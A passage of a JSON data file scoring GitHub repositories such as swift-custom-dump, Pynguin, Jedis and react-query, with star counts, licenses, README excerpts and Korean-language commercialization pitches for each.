ttps://github.com/pointfreeco/swift-custom-dump","stars":10,"language":"Swift","license":"MIT","abandonment_months":2,"description":"# swift-custom-dump 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 자신의 코드 오류를 빠르게 찾아내는 디버깅 도구로, AI가 생성한 코드의 정확성을 검증하는 데 특히 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **AI 코드 생성 검증 SaaS**: 개발자들이 ChatGPT 같은 AI 도구로 만든 코드가 정말 작동하는지 자동 확인하는 웹 서","readme_excerpt":"# Custom Dump\n\n[![CI](https://github.com/pointfreeco/swift-custom-dump/actions/workflows/ci.yml/badge.svg)](https://github.com/pointfreeco/swift-custom-dump/actions/workflows/ci.yml)\n[![](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2Fpointfreeco%2Fswift-custom-dump%2Fbadge%3Ftype%3Dswift-versions)](https://swiftpackageindex.com/pointfreeco/swift-custom-dump)\n[![](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2Fpointfreeco%2Fswift-custom-dump%2Fbadge%3Ftype%3Dplatforms)](https://swiftpackageindex.com/pointfreeco/swift-custom-dump)\n\nA collection of tools for debugging, diffing, and testing your application's data structures.\n\n  * [Motivation](#motivation)\n      * [`customDump`](#customdump)\n      * [`diff`](#diff)\n      * [`expectNoDifference`](#expectnodifference)\n      * [`expectDifference`](#expectdifference)\n  * [Customization](#customization)\n      * [`CustomDumpStringConvertible`](#customdumpstr","composite_score":0.1564,"license_safety_tag":"safe"},{"name":"mate-academy/react_phone-catalog","github_url":"https://github.com/mate-academy/react_phone-catalog","stars":10,"language":"TypeScript","license":"GPL-3.0","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.1564,"license_safety_tag":"restricted"},{"name":"se2p/pynguin","github_url":"https://github.com/se2p/pynguin","stars":437,"language":"Python","license":"MIT","abandonment_months":2,"description":"# Pynguin 상용화 분석\n\n## 왜 보물인가\n프로그래머가 직접 작성하지 않아도 자동으로 소프트웨어 오류를 찾아주는 AI 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (웹 기반 자동 검사 플랫폼)**\n회사들이 소프트웨어를 출시하기 전에 온라인으로 접속해서 오류를 자동 점검하는 구독 서비스로 제공합니다.\n\n**2. 내부 업무 도구 (","readme_excerpt":"<!--\nSPDX-FileCopyrightText: 2019–2026 Pynguin Contributors\n\nSPDX-License-Identifier: CC-BY-4.0\n-->\n\n# Pynguin\n\nPynguin (IPA: ˈpɪŋɡuiːn),\nthe\nPYthoN\nGeneral\nUnIt\ntest\ngeNerator,\nis a tool that allows developers to generate unit tests automatically.\n\nTesting software is often considered to be a tedious task.\nThus, automated generation techniques have been proposed and mature tools exist—for\nstatically typed languages, such as Java.\nThere is, however, no fully-automated tool available that produces unit tests for\ngeneral-purpose programs in a dynamically typed language.\nPynguin is, to the best of our knowledge, the first tool that fills this gap\nand allows the automated generation of unit tests for Python programs.\n\n<details>\n<summary>Internal Pipeline Status</summary>\n\n[![pipeline status](https://gitlab.infosun.fim.uni-passau.de/se2/pynguin/pynguin/badges/main/pipeline.svg)](https://gitlab.infosun.fim.uni-passau.de/se2/pynguin/pynguin/-/commits/main)\n[![coverage report](https://gitlab.i","composite_score":0.1563,"license_safety_tag":"safe"},{"name":"xetorthio/jedis","github_url":"https://github.com/xetorthio/jedis","stars":5,"language":"Java","license":"mit","abandonment_months":0,"description":"# xetorthio/jedis 상용화 분석\n\n## 왜 보물인가\nRedis라는 초고속 데이터 저장소를 Java 프로그래밍 언어에서 쉽게 사용할 수 있게 만든 도구로, 수백만 사용자 규모의 웹서비스에서 필수적으로 사용되는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**: 실시간 채팅, 알림, 랭킹 시스템을 제공하는 웹 애플리케이션에 통합","readme_excerpt":"# Jedis\n\n[![Release](https://img.shields.io/github/release/redis/jedis.svg?sort=semver)](https://github.com/redis/jedis/releases/latest)\n[![Maven Central](https://img.shields.io/maven-central/v/redis.clients/jedis.svg)](https://central.sonatype.com/artifact/redis.clients/jedis)\n[![Javadocs](https://www.javadoc.io/badge/redis.clients/jedis.svg)](https://www.javadoc.io/doc/redis.clients/jedis)\n[![MIT licensed](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/redis/jedis/blob/master/LICENSE)\n[![codecov](https://codecov.io/gh/redis/jedis/branch/master/graph/badge.svg?token=pAstxAAjYo)](https://codecov.io/gh/redis/jedis)\n[![Discord](https://img.shields.io/discord/697882427875393627?style=flat-square)](https://discord.gg/redis)\n\n## What is Jedis?\n\nJedis is a Java client for [Redis](https://github.com/redis/redis \"Redis\") designed for performance and ease of use.\n\nAre you looking for a high-level library to handle object mapping? See [redis-om-spring](https://github.com/","composite_score":0.1562,"license_safety_tag":"safe"},{"name":"miaomiaosoft/PandaOCR.Pro","github_url":"https://github.com/miaomiaosoft/PandaOCR.Pro","stars":5,"language":"","license":"unknown","abandonment_months":8,"description":"# PandaOCR.Pro 상용화 분석\n\n## 왜 보물인가\n사진이나 이미지 속 글자를 자동으로 읽어내는 기술로, 문서 작업을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 웹브라우저에서 바로 사용 가능한 \"온라인 글자 인식 도구\"로 구독료 모델 운영\n**2. 내부 업무 도구**: 대량의 종이 문서나 영수증을 디지털화하는","readme_excerpt":"# 介绍\n- 由于旧版PandaOCR在制作时急于增加各种功能而忽视了代码中的各种执行逻辑和对后续维护或添加新功能的不良影响，导致现在的代码堆积成了一座屎山，每次看到源代码都感到满头大汉，与其去翻那座大山，干脆重来，所以又花不少时间重构了一个全新版本，同时为避免与之前的版本混淆，取名PandaOCR.Pro专业版。\n- 与PandaOCR不同的是，PandaOCR.Pro主要针对使用私用API版接口的人群，演示接口由于普遍不够稳定且经常需要修复终归不会是长久之计。\n- PandaOCR.Pro同样是免费使用，但它有一个激活专业版本状态，在未激活状态下您可以使用除高级功能外的全部功能，同时识别或翻译等功能可使用演示接口和百度API版接口，普通使用基本足够！\n- 激活专业版后不受任何限制，您可以使用全部功能，包括全部已接入的API接口和高级功能，如：图文批量识别、调用本地接口、屏幕对照翻译、屏幕显示按键、按键音效播放、快捷短语翻译等！\n- 如果您喜欢并愿意支持本工具继续提供更好的功能或体验可以考虑激活专业版，也可以单纯捐助，谢谢！\n\n# 特性\n- 重构了整个程序，优化了程序逻辑，所以它理论上应该更稳定，更简洁和更快速。\n- 保留了PandaOCR上已有的大部分功能，同时也精简了少许可能会影响性能且不太常用的功能。\n- 增加了调用本地接口高级功能，专为开发者准备 [调用本地接口教程](https://www.showdoc.com.cn/PandaOCR/11558471145804815)\n- 增加了多种离线OCR引擎调用能力，满足各种识别需求。\n- 增加了一些朋友需要的按OCR位置进行排版的功能，虽然目前还只是实验性，但日后还有优化空间。\n- 优化了行首缩进功能，旧版强行在行首添加多个空格蹩脚实现，现在改由编辑框原生显示，提升识别速度且更美观。\n- 优化了边角触发截图，解决在旧版中容易误触发的问题。\n- 优化了程序界面，使之看上去更精简干净，且基本保留了旧版的样式和操作方式，老人们可以无缝切换。\n- 优化了截图组件2，现在你可以在截图时快速选择应该使用哪类引擎识别，如搜图，扫码，上传图床或识别公式，而不用在程序界面频繁切换。\n- 优化了设置操作，多数设置可直接在程序界面中切换或修改，减少频繁手工编辑配置文件，为新手在使用上提供便利。\n- 优化了预览弹窗，并可以调整弹窗","composite_score":0.156,"license_safety_tag":"unknown"},{"name":"abess-team/abess","github_url":"https://github.com/abess-team/abess","stars":13,"language":"C++","license":"NOASSERTION","abandonment_months":2,"description":"# ABESS 저장소 분석 보고서\n\n## 왜 보물인가\n데이터 분석에서 정말 필요한 변수만 자동으로 찾아내는 AI 기술로, 복잡한 데이터를 간단하게 정리해주는 도구입니다.\n\n## 어디에 팔 수 있나\n1. **SaaS 서비스**: 중소 제조업체가 생산 데이터에서 품질 저하의 원인을 자동으로 찾는 웹 서비스\n2. **내부 업무 도구**: 금융사 리스크팀이 수천 ","readme_excerpt":"<img src='https://raw.githubusercontent.com/abess-team/abess/master/docs/image/icon_long.png' align=\"center\"/></a>\n\n# abess: Fast Best-Subset Selection in Python and R\n\n<p align=\"center\">\n<a href=\"https://github.com/abess-team/abess/actions/workflows/python_test.yml\"><img src=\"https://github.com/abess-team/abess/actions/workflows/python_test.yml/badge.svg\" alt=\"Python Build\"></a>\n<a href=\"https://github.com/abess-team/abess/actions/workflows/r_test.yml\"><img src=\"https://github.com/abess-team/abess/actions/workflows/r_test.yml/badge.svg\" alt=\"R Build\"></a>\n<a href=\"https://codecov.io/gh/abess-team/abess\"><img src=\"https://codecov.io/gh/abess-team/abess/branch/master/graph/badge.svg?token=LK56LHXV00\" alt=\"codecov\"></a>\n<a href=\"https://www.codacy.com/gh/abess-team/abess/dashboard?utm_source=github.com&utm_medium=referral&utm_content=abess-team/abess&utm_campaign=Badge_Grade\"><img src=\"https://app.codacy.com/project/badge/Grade/3f6e60a3a3e44699a033159633981b76\" alt=\"Codacy Badge\"></a>\n<a","composite_score":0.1559,"license_safety_tag":"unknown"},{"name":"TechBowl-japan/html-stations","github_url":"https://github.com/TechBowl-japan/html-stations","stars":14,"language":"TypeScript","license":"NOASSERTION","abandonment_months":7,"description":"","readme_excerpt":"","composite_score":0.1558,"license_safety_tag":"unknown"},{"name":"githubhaohao/LearnFFmpeg","github_url":"https://github.com/githubhaohao/LearnFFmpeg","stars":17,"language":"C++","license":"unknown","abandonment_months":7,"description":"# LearnFFmpeg 저장소 분석\n\n## 왜 보물인가\n영상 처리 기술의 핵심 라이브러리인 FFmpeg를 학습하고 활용하기 위한 실전 코드 모음으로, 동영상 편집·변환·스트리밍 서비스 개발의 기초를 다질 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 동영상 변환 SaaS**\n사용자가 업로드한 영상을 자동으로 다양한 포맷으로 변환해주는 웹 서비스 (예","readme_excerpt":"# Android FFmpeg 音视频开发极简教程\n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/githubhaohao/NDK_OpenGLES_3_0/blob/master/LICENSE.txt)\n![Build](https://img.shields.io/badge/build-passing-brightgreen)\n[![apk](https://img.shields.io/badge/APK-download-green.svg)](https://github.com/githubhaohao/LearnFFmpeg/raw/master/doc/learnffmpeg.apk)\n![star](https://gitcode.com/Kennethdroid/LearnFFmpeg/star/badge.svg)\n\nAn Android FFmpeg audio and video development tutorial.\n\n编译环境: Android Studio 4.1+ ，NDK r21\n\n## 作者声明\n\n有读者反馈，最近有培训机构将本教程进行打包售卖，严重违背了本项目免费开源的初衷。再次声明：**任何商业机构或个人未经作者【微信ID：Byte-Flow 】许可，不得将本教程及其项目配套代码用于 \"打包贩卖、出书和卖课\" 等商业用途，一经发现，全网声讨，并使用法律手段维护作者权益。再次感谢各位读者的监督和反馈。**\n\n## 展示图1\n![gl_player](https://github.com/githubhaohao/LearnFFmpeg/blob/master/doc/filter.gif?raw=true)\n![vr_player](https://github.com/githubhaohao/LearnFFmpeg/blob/master/doc/vr.gif?raw=true)\n\n## 展示图2\n![visual_audio](https://github.com/githubhaohao/LearnFFmpeg/blob/master/doc/visual_audio.g","composite_score":0.1557,"license_safety_tag":"unknown"},{"name":"OpenIMSDK/Open-IM-Server","github_url":"https://github.com/OpenIMSDK/Open-IM-Server","stars":49,"language":"Go","license":"Apache-2.0","abandonment_months":2,"description":"# Open-IM-Server 평가 분석\n\n## 왜 보물인가\n기업이나 앱에서 직원·고객 간 실시간 메시지와 음성통화 기능을 직접 만들고 운영할 수 있는 기반이 됩니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 팀 협업 플랫폼(슬랙 같은 업무용 채팅앱)을 직접 개발하여 구독료로 판매\n2. **내부 업무 도구**: 금융사나 병원 같은 규제 업","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://openim.io\">\n        <img src=\"./assets/logo-gif/openim-logo.gif\" width=\"60%\" height=\"30%\"/>\n    </a>\n</p>\n\n<div align=\"center\">\n\n[![Stars](https://img.shields.io/github/stars/openimsdk/open-im-server?style=for-the-badge&logo=github&colorB=ff69b4)](https://github.com/openimsdk/open-im-server/stargazers)\n[![Forks](https://img.shields.io/github/forks/openimsdk/open-im-server?style=for-the-badge&logo=github&colorB=blue)](https://github.com/openimsdk/open-im-server/network/members)\n[![Codecov](https://img.shields.io/codecov/c/github/openimsdk/open-im-server?style=for-the-badge&logo=codecov&colorB=orange)](https://app.codecov.io/gh/openimsdk/open-im-server)\n[![Go Report Card](https://goreportcard.com/badge/github.com/openimsdk/open-im-server?style=for-the-badge)](https://goreportcard.com/report/github.com/openimsdk/open-im-server)\n[![Go Reference](https://img.shields.io/badge/Go%20Reference-blue.svg?style=for-the-badge&logo=go&logoColor=white)](https:/","composite_score":0.1557,"license_safety_tag":"safe"},{"name":"RohanNagar/jmail","github_url":"https://github.com/RohanNagar/jmail","stars":7,"language":"Java","license":"MIT","abandonment_months":1,"description":"# jmail 저장소 분석\n\n## 왜 보물인가\n이메일 관련 작업을 자동화하고 신뢰성을 높이는 오픈소스 도구로, 기업들의 커뮤니케이션 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업용 자동 이메일 발송 및 관리 플랫폼으로 제공\n- **내부 업무 도구**: 기업의 고객 알림, 거래 확인 이메일 자동 처리 시스템\n","readme_excerpt":"# JMail\n\n<a href=\"https://search.maven.org/artifact/com.sanctionco.jmail/jmail\">\n  <img src=\"https://img.shields.io/maven-central/v/com.sanctionco.jmail/jmail.svg?colorB=brightgreen&label=maven%20central\" alt=\"Maven Central\">\n</a>\n<a href=\"http://javadoc.io/doc/com.sanctionco.jmail/jmail\">\n  <img src=\"http://javadoc.io/badge/com.sanctionco.jmail/jmail.svg\" alt=\"Javadoc\">\n</a>\n<a href=\"https://codecov.io/gh/RohanNagar/jmail\">\n  <img src=\"https://codecov.io/gh/RohanNagar/jmail/branch/master/graph/badge.svg\" alt=\"Coverage Status\">\n</a>\n<a href=\"https://search.maven.org/artifact/com.sanctionco.jmail/jmail\">\n  <img src=\"https://img.shields.io/badge/monthly_downloads-110%2C503-green\" alt=\"Monthly Downloads\">\n</a>\n\nA modern, fast, zero-dependency library for working with email addresses\nand performing email address validation in Java.\n\nBuilt for Java 8 and up.\n\n[Try out the algorithm online!](https://www.rohannagar.com/jmail/)\n\n[Why JMail?](#why-jmail) • [Installation](#installation) • [Usage","composite_score":0.1553,"license_safety_tag":"safe"},{"name":"yolojewjitsu/moon-dev-ai-agents","github_url":"https://github.com/yolojewjitsu/moon-dev-ai-agents","stars":94,"language":"","license":"NOASSERTION","abandonment_months":7,"description":"","readme_excerpt":"","composite_score":0.1553,"license_safety_tag":"unknown"},{"name":"jpmorganchase/quorum","github_url":"https://github.com/jpmorganchase/quorum","stars":5,"language":"Go","license":"LGPL-3.0","abandonment_months":0,"description":"# JPMorgan Chase Quorum 저장소 분석\n\n## 왜 보물인가\n세계 최대 금융사 JPMorgan Chase가 만든 금융거래 기술로, 은행 간 안전한 거래를 가능하게 하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **금융기관 거래 플랫폼 SaaS**: 국내 은행들의 해외송금·결제 시스템을 더 빠르고 안전하게 만들어 월 이용료로 판매\n2","readme_excerpt":"# <img src=\"https://raw.githubusercontent.com/consensys/quorum/master/logo.png\" width=\"200\" height=\"35\"/>\n\n\n![Build Check](https://github.com/jpmorganchase/quorum/workflows/Build%20Check/badge.svg?branch=master)\n[![Docker Pulls](https://img.shields.io/docker/pulls/quorumengineering/quorum)](https://hub.docker.com/r/quorumengineering/quorum)\n[![Discord](https://img.shields.io/discord/697535391594446898)](https://discord.com/channels/697535391594446898/747810572937986240)\n\n\nGoQuorum is an Ethereum-based distributed ledger protocol with transaction/contract privacy and new consensus mechanisms.\n\nGoQuorum is a fork of [go-ethereum](https://github.com/ethereum/go-ethereum) and is updated in line with go-ethereum releases.\n\nKey enhancements over go-ethereum:\n\n* [__Privacy__](https://consensys.net/docs/goquorum//en/latest/concepts/privacy/) - GoQuorum supports private transactions and private contracts through public/private state separation, and utilises peer-to-peer encrypted message exchan","composite_score":0.1547,"license_safety_tag":"restricted"},{"name":"hrsh7th/vim-vsnip","github_url":"https://github.com/hrsh7th/vim-vsnip","stars":5,"language":"Vim Script","license":"MIT","abandonment_months":8,"description":"# vim-vsnip 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 반복적인 코드 작성을 자동으로 처리해 생산성을 크게 높일 수 있는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자용 SaaS 플랫폼**: 클라우드 기반 코딩 환경에 내장된 자동 완성 기능으로 유료 구독 모델 운영\n2. **기업 내부 개발 도구**: IT 회사들이 사내 코딩 표준","readme_excerpt":"# vim-vsnip\n\nVSCode(LSP)'s snippet feature in vim/nvim.\n\n# Features\n\n- Nested placeholders\n  - You can define snippet like `console.log($1${2:, $1})$0`\n- Nested snippet expansion\n  - You can expand snippet even if you already activated other snippet (it will be merged as one snippet)\n- Load snippet from VSCode extension\n  - If you install VSCode extension via `Plug 'golang/vscode-go'`, vsnip will load those snippets.\n- Support many LSP-client & completion-engine by [vim-vsnip-integ](https://github.com/hrsh7th/vim-vsnip-integ)\n  - LSP-client\n    - [vim-lsp](https://github.com/prabirshrestha/vim-lsp)\n    - [vim-lsc](https://github.com/natebosch/vim-lsc)\n    - [yegappan-lsp](https://github.com/yegappan/lsp)\n    - [LanguageClient-neovim](https://github.com/autozimu/LanguageClient-neovim)\n    - [neovim built-in lsp](https://github.com/neovim/neovim)\n  - completion-engine\n    - [asyncomplete.vim](https://github.com/prabirshrestha/asyncomplete.vim)\n    - [vim-mucomplete](https://github.com/li","composite_score":0.1545,"license_safety_tag":"safe"},{"name":"pmarsceill/just-the-docs","github_url":"https://github.com/pmarsceill/just-the-docs","stars":8,"language":"SCSS","license":"MIT","abandonment_months":0,"description":"# Just-the-Docs 분석 보고서\n\n## 왜 보물인가\n누구나 쉽게 예쁜 문서 웹사이트를 만들 수 있는 무료 템플릿으로, 기술 문서가 필요한 모든 회사의 첫 번째 선택지가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: API 문서나 사용자 가이드를 자동으로 생성하는 온라인 플랫폼으로 제공\n2. **내부 업무 도구**: 기업","readme_excerpt":"<p align=\"right\">\n    <a href=\"https://badge.fury.io/rb/just-the-docs\"><img src=\"https://badge.fury.io/rb/just-the-docs.svg\" alt=\"Gem version\"></a> <a href=\"https://github.com/just-the-docs/just-the-docs/actions/workflows/ci.yml\"><img src=\"https://github.com/just-the-docs/just-the-docs/actions/workflows/ci.yml/badge.svg\" alt=\"CI Build status\"></a> <a href=\"https://app.netlify.com/sites/just-the-docs/deploys\"><img src=\"https://api.netlify.com/api/v1/badges/9dc0386d-c2a4-4077-ad83-f02c33a6c0ca/deploy-status\" alt=\"Netlify Status\"></a>\n</p>\n<br><br>\n<p align=\"center\">\n    <h1 align=\"center\">Just the Docs</h1>\n    <p align=\"center\">A modern, highly customizable, and responsive Jekyll theme for documentation with built-in search.<br>Easily hosted on GitHub Pages with few dependencies.</p>\n    <p align=\"center\"><strong><a href=\"https://just-the-docs.com/\">See it in action!</a></strong></p>\n    <br><br><br>\n</p>\n\n<p align=\"center\">A video walkthrough of various Just the Docs features</p>\n\nhttp","composite_score":0.1541,"license_safety_tag":"safe"},{"name":"scrooloose/nerdtree","github_url":"https://github.com/scrooloose/nerdtree","stars":5,"language":"Vim Script","license":"WTFPL","abandonment_months":8,"description":"# NerdTree 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 매일 사용하는 파일 탐색 도구로, 작업 효율을 크게 높여주는 검증된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 IDE 통합 SaaS**: 웹 기반 코딩 환경에 내장하여 파일 관리 기능 강화\n2. **기업 코드 검토 플랫폼**: 내부 소프트웨어 개발팀을 위한 코드 협업 도구로 판","readme_excerpt":"# The NERDTree [![Vint](https://github.com/preservim/nerdtree/workflows/Vint/badge.svg)](https://github.com/preservim/nerdtree/actions?workflow=Vint)\n\n## Introduction\n\nThe NERDTree is a file system explorer for the Vim editor. Using this plugin, users can visually browse complex directory hierarchies, quickly open files for reading or editing, and perform basic file system operations.\n\n![NERDTree Screenshot](https://github.com/preservim/nerdtree/raw/master/screenshot.png)\n\n## Installation\n\nUse your favorite plugin manager to install this plugin. [tpope/vim-pathogen](https://github.com/tpope/vim-pathogen), [VundleVim/Vundle.vim](https://github.com/VundleVim/Vundle.vim), [junegunn/vim-plug](https://github.com/junegunn/vim-plug), and [Shougo/dein.vim](https://github.com/Shougo/dein.vim) are some of the more popular ones. A lengthy discussion of these and other managers can be found on [vi.stackexchange.com](https://vi.stackexchange.com/questions/388/what-is-the-difference-between-the-vim-","composite_score":0.154,"license_safety_tag":"safe"},{"name":"JStumpp/awesome-android","github_url":"https://github.com/JStumpp/awesome-android","stars":6,"language":"","license":"cc0-1.0","abandonment_months":7,"description":"# awesome-android 분석\n\n## 왜 보물인가\n안드로이드 앱 개발에 필요한 좋은 도구, 라이브러리, 학습 자료들을 한 곳에 정리한 '핸드북'으로, 개발자들이 시간을 절약하고 더 나은 앱을 만들 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발 교육 플랫폼**: 초보자부터 전문가까지를 위한 안드로이드 학습 가이드를 유료 구독형으로 판","readme_excerpt":"# Awesome Android\n[<img src=\"https://raw.githubusercontent.com/jstumpp/awesome-android/master/awesome-android.png\">](https://github.com/jstumpp/awesome-android)\n\n<p align=\"center\">\n  <a href=\"https://github.com/sindresorhus/awesome\"><img alt=\"awesome\" src=\"https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg\" /></a>\n  <a href=\"https://travis-ci.org/JStumpp/awesome-android\"><img alt=\"Build Status\" src=\"https://api.travis-ci.org/JStumpp/awesome-android.svg?branch=master\" /></a>\n  <img alt=\"PRs Welcome\" src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg\" />\n</p>\n\n# About\nA curated list of awesome Android [libraries](#libraries) and [resources](#resources). For general Java libraries have a look at [awesome-java](https://github.com/akullpp/awesome-java).\n\n## Supported with ❤️ by [Instabug](https://instabug.com/android/sdk?utm_source=toolsofthetrade&utm_medium=spon&utm_content=header)\n### Understand How Your Android App is Doing wit","composite_score":0.1539,"license_safety_tag":"unknown"},{"name":"quantumblacklabs/kedro","github_url":"https://github.com/quantumblacklabs/kedro","stars":7,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# Kedro 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 분석 프로젝트를 체계적으로 관리하고 재사용 가능하게 만들어주는 표준화된 틀입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 데이터 분석 SaaS 서비스**\n기업이 자신의 데이터를 업로드하면 자동으로 정리·분석해주는 클라우드 서비스로 제공 가능합니다.\n\n**2. 대기업 내부 데이터팀 도구**\n마케팅·재","readme_excerpt":"<p align=\"center\">\n  <picture>\n    <source media=\"(prefers-color-scheme: light)\" srcset=\"https://raw.githubusercontent.com/kedro-org/kedro/main/.github/demo-light.png\">\n    <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://raw.githubusercontent.com/kedro-org/kedro/main/.github/demo-dark.png\">\n    <img src=\"https://raw.githubusercontent.com/kedro-org/kedro/main/.github/demo-light.png\" alt=\"Kedro\">\n  </picture>\n</p>\n\n[![Python version](https://img.shields.io/badge/python-3.10%20%7C%203.11%20%7C%203.12%20%7C%203.13%20%7C%203.14-blue.svg)](https://pypi.org/project/kedro/)\n[![PyPI version](https://badge.fury.io/py/kedro.svg)](https://pypi.org/project/kedro/)\n[![Conda version](https://img.shields.io/conda/vn/conda-forge/kedro.svg)](https://anaconda.org/conda-forge/kedro)\n[![License](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](https://github.com/kedro-org/kedro/blob/main/LICENSE.md)\n[![Slack Organisation](https://img.shields.io/badge/slack-chat-blueviolet.svg?label","composite_score":0.1537,"license_safety_tag":"safe"},{"name":"blinksh/fonts","github_url":"https://github.com/blinksh/fonts","stars":10,"language":"Shell","license":"unknown","abandonment_months":12,"description":"# blinksh/fonts 저장소 분석\n\n## 왜 보물인가\n터미널 환경에서 글꼴을 아름답게 표시할 수 있는 작은 도구로, 개발자와 설계자들이 명령창에서도 멋진 텍스트를 사용할 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 도구 SaaS**: 터미널 환경을 제공하는 클라우드 개발 플랫폼에 글꼴 라이브러리를 내장하여 사용자 경험 향상\n2. *","readme_excerpt":"# Blink Shell Fonts\n\nWith [Blink Shell](http://www.blink.sh) you can have your terminal, your way. We know how important it is for you to have your color scheme and font that you feel comfortable looking at all day.\n\nAlthough [iOS now supports installing fonts at the OS level](https://9to5mac.com/2019/06/12/ios-13-how-to-use-custom-fonts-on-iphone-and-ipad/), the process is still cumbersome.\n\nIn this gallery you will find a wide range of fonts to use with Blink:\n\n- [Nerd Fonts.](https://github.com/blinksh/patched-fonts.git) - With an extended character set useful in new CLI text editors.\n- [Normal fonts.](https://github.com/blinksh/unpatched-fonts.git) - The same set of fonts without Nerd Font patches.\n\nTo install them, just paste the URL of the CSS font under Appearance -> Fonts -> New Font.\n\nThese fonts are based on the great work at the [Nerd-Fonts repository](https://github.com/ryanoasis/nerd-fonts), so to their maintainers goes all the credit.\n\nFor themes, check also the [Themes G","composite_score":0.1536,"license_safety_tag":"unknown"},{"name":"rougier/scientific-visualization-book","github_url":"https://github.com/rougier/scientific-visualization-book","stars":60,"language":"Python","license":"NOASSERTION","abandonment_months":5,"description":"# Scientific Visualization Book 분석\n\n## 왜 보물인가\n복잡한 과학 데이터를 아름답고 이해하기 쉬운 그림으로 만드는 방법을 배울 수 있는 실용 교재입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 과학자/연구원을 위한 데이터 시각화 온라인 도구 (데이터 업로드 → 자동 차트 생성)\n2. **내부 업무 도구**: ","readme_excerpt":"## Scientific Visualization: Python + Matplotlib\n**Nicolas P. Rougier, Bordeaux, November 2021.**  \n\n<img src=\"images/book.png\" width=\"25%\" alt=\"Front cover\" align=\"left\"/>\n\nThe Python scientific visualisation landscape is huge. It is composed of a myriad of tools, ranging from the most versatile and widely used down to the more specialised and confidential. Some of these tools are community based while others are developed by companies. Some are made specifically for the web, others are for the desktop only, some deal with 3D and large data, while others target flawless 2D rendering. In this landscape, Matplotlib has a very special place. It is a versatile and powerful library that allows you to design very high quality figures, suitable for scientific publishing. It also offers a simple and intuitive interface as well as an object oriented architecture that allows you to tweak anything within a figure. Finally, it can be used as a regular graphic library in order to design non‐scient","composite_score":0.1534,"license_safety_tag":"unknown"},{"name":"tannerlinsley/react-query","github_url":"https://github.com/tannerlinsley/react-query","stars":29,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# React Query 프로젝트 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 서버의 데이터를 효율적으로 관리하고 자동으로 최신 상태로 유지해주는 도구로, 개발자의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 대시보드나 분석 도구에서 실시간 데이터를 자동으로 새로 고침하는 기능\n- **내부 업무 도구**: ","readme_excerpt":"<img referrerpolicy=\"no-referrer-when-downgrade\" src=\"https://static.scarf.sh/a.png?x-pxid=be2d8a11-9712-4c1d-9963-580b2d4fb133\" />\n\n<div align=\"center\">\n  <img src=\"./media/header_query.png\" alt=\"TanStack Query\" />\n</div>\n\n<br />\n\n<div align=\"center\">\n<a href=\"https://www.npmjs.com/package/@tanstack/query-core\" target=\"_parent\">\n  <img alt=\"\" src=\"https://img.shields.io/npm/dm/@tanstack/query-core.svg\" alt=\"npm downloads\" />\n</a>\n <a href=\"https://github.com/TanStack/query/stargazers\" target=\"_parent\">\n  <img alt=\"\" src=\"https://img.shields.io/github/stars/TanStack/query.svg?style=social&label=Star\" alt=\"GitHub stars\" />\n</a>\n<a href=\"https://bundlejs.com/?q=%40tanstack%2Freact-query&config=%7B%22esbuild%22%3A%7B%22external%22%3A%5B%22react%22%2C%22react-dom%22%5D%7D%7D&badge=\" target=\"_parent\">\n  <img alt=\"\" src=\"https://deno.bundlejs.com/?q=@tanstack/react-query&config={%22esbuild%22:{%22external%22:[%22react%22,%22react-dom%22]}}&badge=detailed\" alt=\"Bundle size\" />\n</a>\n</div>\n\n<d","composite_score":0.1534,"license_safety_tag":"safe"},{"name":"itorr/nbnhhsh","github_url":"https://github.com/itorr/nbnhhsh","stars":7,"language":"JavaScript","license":"Apache-2.0","abandonment_months":7,"description":"# itorr/nbnhhsh 보물 분석\n\n## 왜 보물인가\n인터넷 약자와 줄임말을 자동으로 풀어주는 도구로, 온라인 커뮤니티에서 소통할 때 \"ㅇㅈ\" 같은 낯선 표현의 의미를 즉시 알려줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 커뮤니티 플랫폼의 내장 기능**\n- Reddit, 디시인사이드, 커뮤니티 앱에서 사용자가 댓글의 약자를 클릭하면 의미를 바","readme_excerpt":"# 😩「能不能好好说话？」 拼音首字母缩写翻译工具\n\n社交平台上通过拼音首字母缩写指代特定词句的情况越来越多，为了让常人勉强能理解这一门另类沟通方式、做了这一个划词翻译油猴脚本。\n\n## 独立网页版本\nhttps://lab.magiconch.com/nbnhhsh/\n\n\n## 安装脚本\n安装好用户脚本浏览器插件之后，访问 